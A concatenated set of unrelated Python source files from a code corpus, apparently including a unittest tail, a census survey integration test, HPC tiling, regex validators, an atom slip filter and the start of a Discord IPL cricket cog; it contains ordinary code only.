        expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 3)
        self.assertEqual(expected, computed)
        return

    ''' Data 2 '''

    def test_nemex_bucket_t1_data_2(self):
        expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 1)
        self.assertEqual(expected, computed)
        return

    def test_nemex_bucket_t2_data_2(self):
        expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 2)
        self.assertEqual(expected, computed)
        return

    def test_nemex_bucket_t3_data_2(self):
        expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 3)
        self.assertEqual(expected, computed)
        return

    def tearDown(self) -> None:
        return None

    # TODO: data 3-8
    ''' Data 3 '''
    ''' Data 4 '''
    ''' Data 5 '''
    ''' Data 6 '''
    ''' Data 7 '''
    ''' Data 8 '''
# Allow running this test module directly: `python test_nemex.py`.
if __name__ == '__main__':
    unittest.main()
| 2.5625 | 3 |
python3/demo.extend/my_demo.py | cdluminate/MyNotes | 0 | 12762206 | <reponame>cdluminate/MyNotes
import my

# Exercise the compiled 'my' extension module.
# NOTE(review): return values look like status codes -- confirm against
# the extension's C source.
status1 = my.hello()
status2 = my.echo('Hi my module!')
| 1.375 | 1 |
xidplus/HPC.py | MCarmenCampos/XID_plus | 3 | 12762207 | <filename>xidplus/HPC.py
import sys
import os
import numpy as np
from xidplus import moc_routines
from builtins import input
import pickle
import xidplus
def hierarchical_tile(masterfile, tilefile):
    """
    Create Hierarchical tile from Master prior.

    Reads the SGE array-job index from the environment (or prompts for it),
    loads the tiling scheme and the master prior list, cuts each prior down
    to this task's large tile, and pickles the result to
    ``Tile_<tile>_<order>.pkl``.

    :param masterfile: Master prior file
    :param tilefile: File containing Tiling scheme
    """
    try:
        # SGE supplies the (1-based) array-job index via the environment.
        # np.int was deprecated in NumPy 1.20 and removed in 1.24; the
        # builtin int behaves identically here.
        taskid = int(os.environ['SGE_TASK_ID'])
        task_first = int(os.environ['SGE_TASK_FIRST'])
        task_last = int(os.environ['SGE_TASK_LAST'])
    except KeyError:
        print("Error: could not read SGE_TASK_ID from environment")
        taskid = int(input("Please enter task id: "))
        print("you entered", taskid)

    # Load the tiling scheme (tiles and HEALPix orders at two resolutions).
    with open(tilefile, 'rb') as f:
        obj = pickle.load(f)
    tiles = obj['tiles']
    order = obj['order']
    tiles_large = obj['tiles_large']
    order_large = obj['order_large']

    # Load the master priors and restrict each one to this task's tile.
    obj = xidplus.io.pickle_load(masterfile)
    priors = obj['priors']
    moc = moc_routines.get_fitting_region(order_large, tiles_large[taskid - 1])
    for p in priors:
        p.moc = moc
        p.cut_down_prior()

    outfile = 'Tile_' + str(tiles_large[taskid - 1]) + '_' + str(order_large) + '.pkl'
    with open(outfile, 'wb') as f:
        pickle.dump({'priors': priors, 'version': xidplus.io.git_version()}, f)
chapter5/handedclock.py | chavo1/playground-python | 0 | 12762208 | import time
current_time = time.localtime()
hour = current_time.tm_hour
print('The hour is', hour)
| 3.375 | 3 |
tests/integration/census/test_census_individual_submission_data.py | ONSdigital/census-survey-runner | 0 | 12762209 | from tests.integration.integration_test_case import IntegrationTestCase
class TestCensusIndividualSubmissionData(IntegrationTestCase):
    """Integration test: complete the census 'individual' survey and verify
    the downstream submission payload matches the expected answer list."""

    def test_census_individual_data_matches_census_individual(self):
        self.complete_survey('census', 'individual')

        # Only verifying 'data'
        actual_downstream_data = self.dumpSubmission()['submission']['data']
        expected_downstream_data = self.get_expected_submission_data()

        self.assertCountEqual(actual_downstream_data, expected_downstream_data)

    @staticmethod
    def get_expected_submission_data():
        # The full expected downstream payload: one entry per answer id, in
        # the same {group_instance, value, answer_instance, answer_id} shape
        # the submission serializer emits.
        expected_downstream_data = [
            {
                'group_instance': 0,
                'value': 'Danny',
                'answer_instance': 0,
                'answer_id': 'first-name'
            },
            {
                'group_instance': 0,
                'value': 'K',
                'answer_instance': 0,
                'answer_id': 'middle-names'
            },
            {
                'group_instance': 0,
                'value': 'Boje',
                'answer_instance': 0,
                'answer_id': 'last-name'
            },
            {
                'group_instance': 0,
                'value': 'Male',
                'answer_instance': 0,
                'answer_id': 'sex-answer'
            },
            {
                'group_instance': 0,
                'value': '1988-05-12',
                'answer_instance': 0,
                'answer_id': 'date-of-birth-answer'
            },
            {
                'group_instance': 0,
                'value': 'In a registered same-sex civil partnership',
                'answer_instance': 0,
                'answer_id': 'marital-status-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes, an address within the UK',
                'answer_instance': 0,
                'answer_id': 'another-address-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'another-address-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'Newport',
                'answer_instance': 0,
                'answer_id': 'other-address-answer-city'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'other-address-answer-street'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'other-address-answer-county'
            },
            {
                'group_instance': 0,
                'value': '12',
                'answer_instance': 0,
                'answer_id': 'other-address-answer-building'
            },
            {
                'group_instance': 0,
                'value': 'NP10 8XG',
                'answer_instance': 0,
                'answer_id': 'other-address-answer-postcode'
            },
            {
                'group_instance': 0,
                'value': 'Friends Home',
                'answer_instance': 0,
                'answer_id': 'address-type-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'Other',
                'answer_instance': 0,
                'answer_id': 'address-type-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes',
                'answer_instance': 0,
                'answer_id': 'in-education-answer'
            },
            {
                'group_instance': 0,
                'value': 'here, at this address',
                'answer_instance': 0,
                'answer_id': 'term-time-location-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'country-of-birth-wales-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'England',
                'answer_instance': 0,
                'answer_id': 'country-of-birth-england-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'country-of-birth-england-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'Yes, 1 -19 hours a week',
                'answer_instance': 0,
                'answer_id': 'carer-answer'
            },
            {
                'group_instance': 0,
                'value': 'Ind',
                'answer_instance': 0,
                'answer_id': 'national-identity-england-answer-other'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'national-identity-wales-answer-other'
            },
            {
                'group_instance': 0,
                'value': [
                    'English',
                    'Welsh',
                    'Scottish',
                    'Northern Irish',
                    'British',
                    'Other'
                ],
                'answer_instance': 0,
                'answer_id': 'national-identity-england-answer'
            },
            {
                'group_instance': 0,
                'value': [],
                'answer_instance': 0,
                'answer_id': 'national-identity-wales-answer'
            },
            {
                'group_instance': 0,
                'value': 'Other ethnic group',
                'answer_instance': 0,
                'answer_id': 'ethnic-group-england-answer'
            },
            {
                'group_instance': 0,
                'value': 'Other',
                'answer_instance': 0,
                'answer_id': 'other-ethnic-group-answer'
            },
            {
                'group_instance': 0,
                'value': 'Telugu',
                'answer_instance': 0,
                'answer_id': 'other-ethnic-group-answer-other'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'language-welsh-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'English',
                'answer_instance': 0,
                'answer_id': 'language-england-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'language-england-answer-other'
            },
            {
                'group_instance': 0,
                'value': [],
                'answer_instance': 0,
                'answer_id': 'religion-welsh-answer'
            },
            {
                'group_instance': 0,
                'value': [
                    'No religion',
                    'Christian (Including Church of England, Catholic, Protestant and all other Christian denominations)',
                    'Buddhist',
                    'Hindu',
                    'Jewish',
                    'Muslim',
                    'Sikh',
                    'Other'
                ],
                'answer_instance': 0,
                'answer_id': 'religion-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'religion-welsh-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'Ind',
                'answer_instance': 0,
                'answer_id': 'religion-answer-other'
            },
            {
                'group_instance': 0,
                'value': 'This address',
                'answer_instance': 0,
                'answer_id': 'past-usual-address-answer'
            },
            {
                'group_instance': 0,
                'value': '',
                'answer_instance': 0,
                'answer_id': 'past-usual-address-answer-other'
            },
            {
                'group_instance': 0,
                'value': [
                    'United Kingdom'
                ],
                'answer_instance': 0,
                'answer_id': 'passports-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes, limited a lot',
                'answer_instance': 0,
                'answer_id': 'disability-answer'
            },
            {
                'group_instance': 0,
                'value': [
                    'Masters Degree',
                    'Postgraduate Certificate / Diploma'
                ],
                'answer_instance': 0,
                'answer_id': 'qualifications-england-answer'
            },
            {
                'group_instance': 0,
                'value': [],
                'answer_instance': 0,
                'answer_id': 'qualifications-welsh-answer'
            },
            {
                'group_instance': 0,
                'value': 'No',
                'answer_instance': 0,
                'answer_id': 'volunteering-answer'
            },
            {
                'group_instance': 0,
                'value': [
                    'none of the above?'
                ],
                'answer_instance': 0,
                'answer_id': 'employment-type-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes',
                'answer_instance': 0,
                'answer_id': 'jobseeker-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes',
                'answer_instance': 0,
                'answer_id': 'job-availability-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes',
                'answer_instance': 0,
                'answer_id': 'job-pending-answer'
            },
            {
                'group_instance': 0,
                'value': [
                    'a student?',
                    'long-term sick or disabled?'
                ],
                'answer_instance': 0,
                'answer_id': 'occupation-answer'
            },
            {
                'group_instance': 0,
                'value': 'Yes',
                'answer_instance': 0,
                'answer_id': 'ever-worked-answer'
            },
            {
                'group_instance': 0,
                'value': 'an employee?',
                'answer_instance': 0,
                'answer_id': 'main-job-answer'
            },
            {
                'group_instance': 0,
                'value': 'Software Engineer',
                'answer_instance': 0,
                'answer_id': 'job-title-answer'
            },
            {
                'group_instance': 0,
                'value': 'Development',
                'answer_instance': 0,
                'answer_id': 'job-description-answer'
            },
            {
                'group_instance': 0,
                'value': '31 - 48',
                'answer_instance': 0,
                'answer_id': 'hours-worked-answer'
            },
            {
                'group_instance': 0,
                'value': 'Train',
                'answer_instance': 0,
                'answer_id': 'work-travel-answer'
            },
            {
                'group_instance': 0,
                'value': 'Civil Servant',
                'answer_instance': 0,
                'answer_id': 'employers-business-answer'
            },
            {
                'group_instance': 0,
                'value': 'Employed by an organisation or business',
                'answer_instance': 0,
                'answer_id': 'main-job-type-answer'
            },
            {
                'group_instance': 0,
                'value': 'ONS',
                'answer_instance': 0,
                'answer_id': 'business-name-answer'
            }
        ]
        return expected_downstream_data

    def complete_survey(self, eq_id, form_type_id):
        # Walk through every page of the survey, posting one answer dict per
        # page, until the summary screen is reached.
        self.launchSurvey(eq_id, form_type_id, region_code='GB-ENG', sexual_identity=False, roles=['dumper'])

        # We are in the questionnaire
        self.assertInPage('What is your name?')
        self.assertInPage('>Save and continue<')

        post_data = [
            {
                'first-name': 'Danny',
                'middle-names': 'K',
                'last-name': 'Boje'
            },
            {
                'sex-answer': ['Male']
            },
            {
                'date-of-birth-answer-day': '12',
                'date-of-birth-answer-month': '5',
                'date-of-birth-answer-year': '1988',
            },
            {
                'marital-status-answer': ['In a registered same-sex civil partnership']
            },
            {
                'another-address-answer': ['Yes, an address within the UK']
            },
            {
                'other-address-answer-building': '12',
                'other-address-answer-city': 'Newport',
                'other-address-answer-postcode': 'NP10 8XG'
            },
            {
                'address-type-answer': ['Other'],
                'address-type-answer-other': 'Friends Home'
            },
            {
                'in-education-answer': ['Yes']
            },
            {
                'term-time-location-answer': ['here, at this address']
            },
            {
                'country-of-birth-england-answer': ['England']
            },
            {
                'carer-answer': ['Yes, 1 -19 hours a week']
            },
            {
                'national-identity-england-answer': ['English',
                                                     'Welsh',
                                                     'Scottish',
                                                     'Northern Irish',
                                                     'British',
                                                     'Other'],
                'national-identity-england-answer-other': 'Ind'
            },
            {
                'ethnic-group-england-answer': ['Other ethnic group']
            },
            {
                'other-ethnic-group-answer': ['Other'],
                'other-ethnic-group-answer-other': 'Telugu'
            },
            {
                'language-england-answer': ['English']
            },
            {
                'religion-answer': ['No religion',
                                    'Christian (Including Church of England, Catholic, Protestant and all other Christian denominations)',
                                    'Buddhist',
                                    'Hindu',
                                    'Jewish',
                                    'Muslim',
                                    'Sikh',
                                    'Other'],
                'religion-answer-other': 'Ind'
            },
            {
                'past-usual-address-answer': ['This address']
            },
            {
                'passports-answer': ['United Kingdom']
            },
            {
                'disability-answer': ['Yes, limited a lot']
            },
            {
                'qualifications-england-answer': ['Masters Degree',
                                                  'Postgraduate Certificate / Diploma']
            },
            {
                'volunteering-answer': ['No']
            },
            {
                'employment-type-answer': ['none of the above?']
            },
            {
                'jobseeker-answer': ['Yes']
            },
            {
                'job-availability-answer': ['Yes']
            },
            {
                'job-pending-answer': ['Yes']
            },
            {
                'occupation-answer': ['a student?',
                                      'long-term sick or disabled?']
            },
            {
                'ever-worked-answer': ['Yes']
            },
            {
                'main-job-answer': ['an employee?']
            },
            {
                'job-title-answer': 'Software Engineer'
            },
            {
                'job-description-answer': 'Development'
            },
            {
                'hours-worked-answer': ['31 - 48']
            },
            {
                'work-travel-answer': ['Train']
            },
            {
                'employers-business-answer': 'Civil Servant'
            },
            {
                'main-job-type-answer': ['Employed by an organisation or business']
            },
            {
                'business-name-answer': 'ONS'
            }
        ]

        for post in post_data:
            self.post(post_data=post)

        # There are no validation errors (we're on the summary screen)
        self.assertInPage('You’re ready to submit your 2017 Census Test')
| 2.5625 | 3 |
src/monitoring_service/constants.py | hackaugusto/raiden-services | 0 | 12762210 | from datetime import timedelta
DEFAULT_REQUIRED_CONFIRMATIONS: int = 10
MAX_FILTER_INTERVAL: int = 100_000
DEFAULT_GAS_BUFFER_FACTOR: int = 10
DEFAULT_GAS_CHECK_BLOCKS: int = 100
KEEP_MRS_WITHOUT_CHANNEL: timedelta = timedelta(minutes=15)
# A LockedTransfer message is roughly 1kb. Having 1000/min = 17/sec will be
# hard to achieve outside of benchmarks for now. To have some safety margin for
# bursts of messages, this is only enforced as an average over 5 minutes.
MATRIX_RATE_LIMIT_ALLOWED_BYTES = 5_000_000
MATRIX_RATE_LIMIT_RESET_INTERVAL = timedelta(minutes=5)
# Number of blocks after the close, during which MRs are still being accepted
CHANNEL_CLOSE_MARGIN: int = 10
| 1.742188 | 2 |
pipeline/schemas/validators.py | mystic-ai/pipeline | 7 | 12762211 | import re
# TO-DO: refactor validators as below
# https://pydantic-docs.helpmanual.io/usage/validators/
# Email regex mostly following RFC2822 specification. Covers ~99% of emails in use today
# Allows groups of alphanumerics and some special characters separated by dots,
# followed by a @,
# followed by groups of alphanumerics and non-staring/non-ending dashes,
# separated by dots.
EMAIL_REGEX = re.compile(
r"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
r"@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)"
r"+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"
)
# Simple password regex, requires a minimum of 8 characters with at least one
# uppercase letter, one lowercase letter, and one number.
PASSWORD_REGEX = re.compile(r"^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}$")
# Simple username regex, number of characters between 3-24, allowing only alphanumerics,
# dashes and underscores.
USERNAME_REGEX = re.compile(r"^[a-zA-Z0-9-_]{3,24}$")
def valid_email(email_string: str) -> bool:
return EMAIL_REGEX.match(email_string) is not None
def valid_password(password_string: str) -> bool:
return PASSWORD_REGEX.match(password_string) is not None
def valid_username(username_string: str) -> bool:
return USERNAME_REGEX.match(username_string) is not None
| 3.09375 | 3 |
tailseq/tools.py | hbc/tailseq-tool-daley | 1 | 12762212 | <filename>tailseq/tools.py
import os
def splitext_plus(f):
    """Split *f* into (base, extension), treating compressed suffixes such
    as ".tar.gz" as a single extension.

    copy from bcbio
    """
    base, ext = os.path.splitext(f)
    if ext not in (".gz", ".bz2", ".zip"):
        return base, ext
    # Compressed file: peel off one more extension and merge the two.
    inner_base, inner_ext = os.path.splitext(base)
    return inner_base, inner_ext + ext
| 2.625 | 3 |
atoman/filtering/filters/slipFilter.py | chrisdjscott/Atoman | 9 | 12762213 |
"""
Slip
====
Calculate slip within the lattice, on an atom by atom basis. This filter works by
comparing the displacement of an atom from its reference position, to the
equivalent displacements of neighbouring atoms from the reference lattice.
If an atom as moved in a different direction to one of its neighbours in the
reference then it has "slipped". Once slip is calculated you can filter atoms by
their slip value.
Parameters affecting this filter are:
.. glossary::
Neighbour cut-off
Atoms are said to have been neighbours in the reference lattice if their
separation was less than this value.
Slip tolerance
If the magnitude of the slip contribution between an atom and one of its
neighbours is less than this value we ignore it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import numpy as np
from . import base
from . import _filtering
class SlipFilterSettings(base.BaseSettings):
"""
Settings for the slip filter
"""
def __init__(self):
super(SlipFilterSettings, self).__init__()
self.registerSetting("filteringEnabled", default=False)
self.registerSetting("minSlip", default=0.0)
self.registerSetting("maxSlip", default=9999.0)
self.registerSetting("neighbourCutOff", 3.0)
self.registerSetting("slipTolerance", default=0.3)
class SlipFilter(base.BaseFilter):
"""
Slip filter.
"""
def apply(self, filterInput, settings):
"""Apply the filter."""
# unpack inputs
inputState = filterInput.inputState
refState = filterInput.refState
NScalars = filterInput.NScalars
fullScalars = filterInput.fullScalars
NVectors = filterInput.NVectors
fullVectors = filterInput.fullVectors
visibleAtoms = filterInput.visibleAtoms
driftCompensation = filterInput.driftCompensation
driftVector = filterInput.driftVector
# settings
minSlip = settings.getSetting("minSlip")
maxSlip = settings.getSetting("maxSlip")
cutoff = settings.getSetting("neighbourCutOff")
tol = settings.getSetting("slipTolerance")
filteringEnabled = settings.getSetting("filteringEnabled")
# new scalars array
scalars = np.zeros(len(visibleAtoms), dtype=np.float64)
# call C library
NVisible = _filtering.slipFilter(visibleAtoms, scalars, inputState.pos, refState.pos, inputState.cellDims,
inputState.PBC, minSlip, maxSlip, NScalars, fullScalars, filteringEnabled,
driftCompensation, driftVector, NVectors, fullVectors, cutoff, tol)
# resize visible atoms and scalars
visibleAtoms.resize(NVisible, refcheck=False)
scalars.resize(NVisible, refcheck=False)
# make result and add scalars
result = base.FilterResult()
result.addScalars("Slip", scalars)
return result
| 2.953125 | 3 |
scale/function.py | QingZhan98/SCALE_v2 | 1 | 12762214 | #!/usr/bin/env python
"""
# Author: <NAME>
# Created Time : Tue 29 Sep 2020 01:41:23 PM CST
# File Name: function.py
# Description:
"""
import torch
import numpy as np
import os
import scanpy as sc
from anndata import AnnData
from .data import load_data
from .net.vae import VAE
from .net.utils import EarlyStopping
from .metrics import batch_entropy_mixing_score, silhouette_score
from .logger import create_logger
from .plot import embedding
def SCALE(
        data_list,
        batch_categories=None,
        profile='RNA',
        join='inner',
        batch_key='batch',
        batch_name='batch',
        min_features=600,
        min_cells=3,
        n_top_features=2000,
        batch_size=64,
        lr=2e-4,
        max_iteration=30000,
        seed=124,
        gpu=0,
        outdir='output/',
        projection=None,
        repeat=False,
        impute=None,
        chunk_size=20000,
        ignore_umap=False,
        verbose=False,
        assess=False,
        show=True,
    ):
    """
    Single-Cell integrative Analysis via Latent feature Extraction

    Parameters
    ----------
    data_list
        A path list of AnnData matrices to concatenate with. Each matrix is referred to as a 'batch'.
    batch_categories
        Categories for the batch annotation. By default, use increasing numbers.
    profile
        Specify the single-cell profile, RNA or ATAC. Default: RNA.
    join
        Use intersection ('inner') or union ('outer') of variables of different batches.
    batch_key
        Add the batch annotation to obs using this key. By default, batch_key='batch'.
    batch_name
        Use this annotation in obs as batches for training model. Default: 'batch'.
    min_features
        Filtered out cells that are detected in less than min_features. Default: 600.
    min_cells
        Filtered out genes that are detected in less than min_cells. Default: 3.
    n_top_features
        Number of highly-variable genes to keep. Default: 2000.
    batch_size
        Number of samples per batch to load. Default: 64.
    lr
        Learning rate. Default: 2e-4.
    max_iteration
        Max iterations for training. Training one batch_size samples is one iteration. Default: 30000.
    seed
        Random seed for torch and numpy. Default: 124.
    gpu
        Index of GPU to use if GPU is available. Default: 0.
    outdir
        Output directory. Default: 'output/'.
    projection
        Use for new dataset projection. Input the folder containing the pre-trained model. If None, don't do projection. Default: None.
    repeat
        Use with projection. If False, concatenate the reference and projection datasets for downstream analysis. If True, only use projection datasets. Default: False.
    impute
        If True, calculate the imputed gene expression and store it at adata.layers['impute']. Default: False.
    chunk_size
        Number of samples from the same batch to transform. Default: 20000.
    ignore_umap
        If True, do not perform UMAP for visualization and leiden for clustering. Default: False.
    verbose
        Verbosity, True or False. Default: False.
    assess
        If True, calculate the entropy_batch_mixing score and silhouette score to evaluate integration results. Default: False.

    Returns
    -------
    The output folder contains:
    adata.h5ad
        The AnnData matrice after batch effects removal. The low-dimensional representation of the data is stored at adata.obsm['latent'].
    checkpoint
        model.pt contains the variables of the model and config.pt contains the parameters of the model.
    log.txt
        Records raw data information, filter conditions, model parameters etc.
    umap.pdf
        UMAP plot for visualization.
    """

    # Reproducibility: seed both numpy and torch before any stochastic step.
    np.random.seed(seed) # seed
    torch.manual_seed(seed)

    if torch.cuda.is_available(): # cuda device
        device='cuda'
        torch.cuda.set_device(gpu)
    else:
        device='cpu'

    outdir = outdir+'/'
    os.makedirs(outdir+'/checkpoint', exist_ok=True)
    log = create_logger('', fh=outdir+'log.txt')

    if not projection:
        # Training mode: load data, build the VAE, train it, and save the
        # model weights plus the configuration needed to reload it later.
        adata, trainloader, testloader = load_data(
            data_list, batch_categories,
            join=join,
            profile=profile,
            n_top_features=n_top_features,
            batch_size=batch_size,
            chunk_size=chunk_size,
            min_features=min_features,
            min_cells=min_cells,
            batch_name=batch_name,
            batch_key=batch_key,
            log=log
        )

        early_stopping = EarlyStopping(patience=10, checkpoint_file=outdir+'/checkpoint/model.pt')
        x_dim, n_domain = adata.shape[1], len(adata.obs['batch'].cat.categories)

        # model config
        enc = [['fc', 1024, 1, 'relu'],['fc', 10, '', '']]  # TO DO
        dec = [['fc', x_dim, n_domain, 'sigmoid']]

        model = VAE(enc, dec, n_domain=n_domain)

        log.info('model\n'+model.__repr__())
        model.fit(
            trainloader,
            lr=lr,
            max_iteration=max_iteration,
            device=device,
            early_stopping=early_stopping,
            verbose=verbose,
        )
        torch.save({'n_top_features':adata.var.index, 'enc':enc, 'dec':dec, 'n_domain':n_domain}, outdir+'/checkpoint/config.pt')
    else:
        # Projection mode: restore the pre-trained model and project the
        # new datasets into its latent space (no training).
        state = torch.load(projection+'/checkpoint/config.pt')
        n_top_features, enc, dec, n_domain = state['n_top_features'], state['enc'], state['dec'], state['n_domain']
        model = VAE(enc, dec, n_domain=n_domain)
        model.load_model(projection+'/checkpoint/model.pt')
        model.to(device)

        adata, trainloader, testloader = load_data(
            data_list, batch_categories,
            join='outer',
            profile=profile,
            chunk_size=chunk_size,
            n_top_features=n_top_features,
            min_cells=0,
            min_features=min_features,
            batch_name=batch_name,
            batch_key=batch_key,
            log = log
        )
#         log.info('Processed dataset shape: {}'.format(adata.shape))

    adata.obsm['latent'] = model.encodeBatch(testloader, device=device) # save latent rep
    if impute:
        adata.layers['impute'] = model.encodeBatch(testloader, out='impute', batch_id=impute, device=device)
    log.info('Output dir: {}'.format(outdir))

    if projection and (not repeat):
        # Merge the reference embedding with the newly projected cells.
        ref = sc.read_h5ad(projection+'/adata.h5ad')
        adata = AnnData.concatenate(
            ref, adata,
            batch_categories=['reference', 'query'],
            batch_key='projection',
            index_unique=None
        )

    adata.write(outdir+'adata.h5ad', compression='gzip')

    if not ignore_umap: #and adata.shape[0]<1e6:
        log.info('Plot umap')
        sc.pp.neighbors(adata, n_neighbors=30, use_rep='latent')
        sc.tl.umap(adata, min_dist=0.1)
        sc.tl.leiden(adata)

        # UMAP visualization
        sc.settings.figdir = outdir
        sc.set_figure_params(dpi=80, figsize=(10,10), fontsize=20)
        cols = ['batch', 'celltype', 'leiden']
        color = [c for c in cols if c in adata.obs]
        if len(color) > 0:
            if projection and (not repeat):
                embedding(adata, groupby='projection', save='.pdf', show=show)
            else:
                sc.pl.umap(adata, color=color, save='.pdf', wspace=0.4, ncols=4, show=show)

        if assess:
            # Optional integration-quality metrics on the UMAP embedding.
            if len(adata.obs['batch'].cat.categories) > 1:
                entropy_score = batch_entropy_mixing_score(adata.obsm['X_umap'], adata.obs['batch'])
                log.info('batch_entropy_mixing_score: {:.3f}'.format(entropy_score))

            if 'celltype' in adata.obs:
                sil_score = silhouette_score(adata.obsm['X_umap'], adata.obs['celltype'].cat.codes)
                log.info("silhouette_score: {:.3f}".format(sil_score))

    # Written twice on purpose? The earlier write lacks UMAP/leiden results;
    # this one persists them as well.
    adata.write(outdir+'adata.h5ad', compression='gzip')

    return adata
def label_transfer(ref, query, rep='latent', label='celltype'):
    """
    Label transfer

    Parameters
    -----------
    ref
        reference containing the projected representations and labels
    query
        query data to transfer label
    rep
        representations to train the classifier. Default is `latent`
    label
        label name. Default is `celltype` stored in ref.obs

    Returns
    --------
    transferred label
    """
    from sklearn.neighbors import KNeighborsClassifier

    X_train = ref.obsm[rep]
    y_train = ref.obs[label]
    X_test = query.obsm[rep]

    # Fit a k-NN classifier on the reference embedding and predict labels
    # for the query cells.  (Fixed the duplicated "knn = knn = ..." typo.)
    knn = KNeighborsClassifier().fit(X_train, y_train)
    y_test = knn.predict(X_test)

    return y_test
| 2.21875 | 2 |
vyperlogix/products/responses.py | raychorn/chrome_gui | 1 | 12762215 | from vyperlogix.hash import lists
# Status codes for the registration/update workflow.
# Negative values indicate failure states, positive values success states.
code_error = -404     # registration could not be processed at all
code_noUpdate = -100  # client already runs the latest version
code_isUpdate = 400   # a newer version is available for download
code_revoked = -500   # product key has been revoked
code_updated = 100    # existing registration updated
code_accepted = 200   # new registration accepted; key will be sent
code_valid = 300      # product id validated
code_invalid = -301   # registration invalid (e.g. payment not processed)

# Site shown to users in the "new version available" message below.
_info_site_address = 'www.VyperLogix.com'

# Maps each status code to the human-readable message presented to the user.
# NOTE(review): HashedLists2 is a project-local dict-like container — assumed
# to behave like a mapping here; verify against vyperlogix.hash.lists.
d_responses = lists.HashedLists2({code_error:'Warning: Unable to process your Registration.',
                                  code_invalid:'Your registration is not valid. Please make sure your payment has processed.',
                                  code_noUpdate:'You have the latest version.',
                                  code_revoked:'Your product key has been revoked. You may Register again to regain access.',
                                  code_updated:'Your registration has been updated and will be processed as quickly as possible.',
                                  code_accepted:'Your registration has been accepted; you should receive your Product Key shortly.',
                                  code_valid:'Your Product ID has been accepted; enjoy the power.',
                                  code_isUpdate:'There is a new version available you can download from %s.' % (_info_site_address)
                                  })
| 2.125 | 2 |
renderoo/component.py | yelluw/renderoo | 0 | 12762216 | <reponame>yelluw/renderoo
class Component:
    """Abstract base class for renderable components.

    Subclasses are expected to override :meth:`render`.
    """

    def render(self):
        """Produce this component's output; must be overridden."""
        raise NotImplementedError
| 1.421875 | 1 |
bot/cogs/ipl/ipl.py | Qtopia-Team/luci | 5 | 12762217 | <gh_stars>1-10
import discord
from discord.ext import commands
import aiohttp
from datetime import date, timedelta
import os
import psycopg2
class IPL(commands.Cog):
    """Get info about today's as well as last match in IPL. See current score and play Sattebaaz Championship"""

    def __init__(self, bot):
        self.bot = bot

        # Initialize a client session used for all cricapi / dog-api requests.
        self.session = aiohttp.ClientSession()
        self.api_matches = "https://cricapi.com/api/matches?"
        self.api_score = "https://cricapi.com/api/cricketScore?"
        self.apikey = os.getenv("CRIC_API_KEY")

        # Initialize connection to the Postgres database.
        DATABASE_URL = os.environ['DATABASE_URL']
        self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
        self.cursor = self.dbcon.cursor()

        # Create tables:
        #   predict   - message id(s) of the active prediction embed(s)
        #   standings - per-user points for the Sattebaaz Championship
        query = """CREATE TABLE IF NOT EXISTS predict
            (embed_id BIGINT NOT NULL)"""
        self.cursor.execute(query)
        self.dbcon.commit()

        query = """CREATE TABLE IF NOT EXISTS standings(
            user_id BIGINT NOT NULL,
            points INT NOT NULL)"""
        self.cursor.execute(query)
        self.dbcon.commit()

        # Links for image url of all the teams and the ipl logo
        self.image_url = {
            "Kolkata Knight Riders": "https://hdsportsnews.com/wp-content/uploads/2020/01/kolkata-knight-riders-kkr-2020-team-squad-players-live-score-time-table-point-table-schedule-auction-match-fixture-venue-highlight-1280x720.jpg",
            "Rajasthan Royals": "https://cdn5.newsnationtv.com/images/2021/02/22/royal-rajasthan-logo-70.jpg",
            "Royal Challengers Bangalore": "https://english.sakshi.com/sites/default/files/article_images/2020/11/8/RCB-Logo_571_855-1604821493.jpg",
            "Mumbai Indians": "https://static.india.com/wp-content/uploads/2017/03/mumbai.jpg?impolicy=Medium_Resize&w=1200&h=800",
            "Punjab Kings": "https://awaj.in/wp-content/uploads/2021/03/20210317_222651.jpg",
            "Sunrisers Hyderabad": "https://2.bp.blogspot.com/-6cAZUQMFCqc/WwKFUZrPPmI/AAAAAAAACcM/TryzryihpEkoOMd6htpE8LjIH1r02FWSgCLcBGAs/s1600/SRH.jpg",
            "Chennai Super Kings": "https://i.pinimg.com/originals/85/52/f8/8552f811e95b998d9505c43a9828c6d6.jpg",
            "Delhi Capitals": "https://d3pc1xvrcw35tl.cloudfront.net/ln/images/686x514/teamsinnerintrodc534x432-resize-534x432-a7542dd51f-d979030f10e79596_202009106828.jpeg"
        }
        self.ipl_logo = "https://img.etimg.com/thumb/width-1200,height-900,imgsize-121113,resizemode-1,msid-81376248/ipl-2021-from-april-9-six-venues-no-home-games-no-spectators.jpg"

    # Update details of last match and upcoming match
    async def fetch_matches(self):
        """Return (last, last_2, next, next_2) match-detail dicts.

